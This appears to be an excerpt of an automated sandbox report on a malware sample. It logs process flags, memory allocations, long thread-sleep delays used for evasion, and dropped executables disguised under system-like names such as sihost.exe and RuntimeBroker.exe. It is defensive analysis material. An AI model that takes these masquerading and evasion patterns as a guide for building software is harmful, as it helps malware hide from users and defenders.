Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: 1570000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: 1AFC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: 15A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: 1B100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 12A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 1ADD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: B40000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 1A5F0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: B50000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: 1AA20000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: 1620000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Memory allocated: 1B1F0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Memory allocated: 32B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Memory allocated: 1B2B0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Memory allocated: 7E0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 680000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 1A450000 memory reserve \| memory write watch
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: 2530000 memory reserve \| memory write watch
Source: C:\Program Files\Microsoft\sihost.exe	Memory allocated: 1A730000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 13C0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Memory allocated: 1B070000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft\sihost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9749
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9734
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9641
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9716

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qcbjycVR.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nASSbBeV.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PvOoeAES.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YehEOcJA.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FMuYuXzk.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iMBUyFOh.log	Jump to dropped file
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eWKdrIOo.log	Jump to dropped file

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe TID: 2380	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Microsoft\sihost.exe TID: 3116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe TID: 2612	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep count: 9747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep time: -22136092888451448s >= -30000s
